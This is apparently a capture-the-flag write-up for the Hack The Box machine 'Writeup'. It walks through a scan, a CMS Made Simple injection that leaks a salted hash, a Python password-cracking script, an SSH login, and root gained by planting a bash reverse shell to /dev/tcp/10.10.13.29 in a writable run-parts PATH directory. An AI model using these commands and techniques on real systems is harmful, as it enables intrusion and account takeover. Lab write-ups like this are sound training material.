Writeup was an easy ranked difficulty machine created by jkr
to begin we will start out with an nmap scan
nmap -sC -sV 10.10.10.138
Nmap scan report for writeup.htb (10.10.10.138) Host is up (0.15s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA) | 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA) |_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/writeup/ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Nothing here yet. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.87 seconds
hmm not very revealing... lets take a look at the site
odd site, doesn't say too much but it has notable things
Eeyore DoS protection script
Page is hand-crafted with vi. not really just funny
lets poke around, the Dos script prevents us from gobusting it and could have affected our nmap scan.
Lets try /robots.txt like nmap showed
Alright so we can find his writeup blog.
An actual writeup blog, interesting. lets look more into it.
viewing the source reveals that the blog is CMS Made Simple lets look into that
but first see if any of his writeups have anything interesting
when you click one of his writeup links we find a ?page variable
this could be vulnerable but since this is a real CMS I doubt it
lets google this CMS and see if we can find anything interesting.
lets see if it is vulnerable to this..
It is vulnerable! and now we have a username and password which is hashed
[+] Salt for password found: 5a599ef579066807 [+] Username found: jkr [+] Email found: email@example.com [+] Password found: 62def4866937f08cc13bab43bb14e6f7
Awesome, lets crack this
lets steal some code from the exploit above
import hashlib def ck_password(): password = "62def4866937f08cc13bab43bb14e6f7" output = "" wordlist = "/usr/share/wordlists/rockyou.txt" salt = "5a599ef579066807" dict = open(wordlist) for line in dict.readlines(): line = line.replace("\n", "") if hashlib.md5(str(salt) + line).hexdigest() == password: output += "\n[+] Password cracked: " + line break print(output) ck_password()
and lets run it with pypy, pypy is python jit so we can bruteforce it much faster
➜ writeup pypy crack.py [+] Password cracked: raykayjay9
alright awesome lets ssh in and get user.txt
➜ www ssh firstname.lastname@example.org email@example.com's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Aug 13 16:52:19 2019 from 10.10.12.63 jkr@writeup:~$
jkr@writeup:~$ cat user.txt d4e493fdOMMITED6a55319f978
lets poke around and see if we can't root lets use linenum and pspy
➜ www ls linux-local-enum.sh pspy32s ➜ www python -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
now lets wget them on the box
linux local enum doesn't show anything out of the ordinary...
we are on debian
Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
sudo is not present.
lets run pspy
CMD: UID=0 PID=2697 | /usr/bin/python3 /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -b 2019/08/13 17:02:26 CMD: UID=0 PID=2699 | grep -q f2b-apache-404[ \t] 2019/08/13 17:02:26 CMD: UID=0 PID=2698 | /bin/sh -c iptables -w -n -L INPUT | grep -q 'f2b-apache-404[ \t]' 2019/08/13 17:02:26 CMD: UID=0 PID=2700 | /usr/bin/python3 /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -b 2019/08/13 17:02:26 CMD: UID=0 PID=2701 | iptables -w -D f2b-apache-404 -s 10.10.15.113 -j REJECT --reject-with icmp-port-unreachable
thats interesting, but poking around that python script does not look intentionally vulnerable and is read only, Lets keep looking.
2019/08/13 17:04:32 CMD: UID=0 PID=2748 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2019/08/13 17:04:32 CMD: UID=0 PID=2749 | run-parts --lsbsysinit /etc/update-motd.d
that is odd, the path specified /usr/local/sbin is writable and this is being run as root every time someone logs in.
lets try and abuse this.
jkr@writeup:/usr/local/sbin$ echo "test" > k jkr@writeup:/usr/local/sbin$ cat k test jkr@writeup:/usr/local/sbin$
proves we can write there
Now all we have to do is make a executable script or actual executable and log in and run-parts will be executed
lets enumerate /root/
#!/bin/bash ls -la -r /root/ > /tmp/k
now lets login as normal user and trigger it
jkr@writeup:/usr/local/sbin$ cat /tmp/k total 28 -r-------- 1 root root 33 Apr 19 08:44 root.txt drwx------ 2 root root 4096 May 1 09:53 bin -rw-r--r-- 1 root root 148 Jun 3 2018 .profile drwxr-xr-x 2 root root 4096 May 1 09:43 .nano -rw-r--r-- 1 root root 570 Jun 3 2018 .bashrc lrwxrwxrwx 1 root root 9 Apr 19 06:42 .bash_history -> /dev/null drwxr-xr-x 22 root root 4096 Apr 19 07:31 .. drwx------ 4 root root 4096 May 1 09:43 .
well there is no .ssh so we can't add our pubkey and ssh in.
lets make run-parts a bash reverse shell
#!/bin/bash bash -i >& /dev/tcp/10.10.13.29/1337 0>&1
chmod +x it and ssh in as jkr
make sure you have your netcat listening
➜ ~ nc -lvnp 1337 Listening on [0.0.0.0] (family 2, port 1337) Connection from 10.10.10.138 52806 received! bash: cannot set terminal process group (3519): Inappropriate ioctl for device bash: no job control in this shell root@writeup:/#
root@writeup:/root# cat root.txt cat root.txt eeba47f60OMMITTED734f9b6198d7226
Well thats the writeup for writeup. Thanks for reading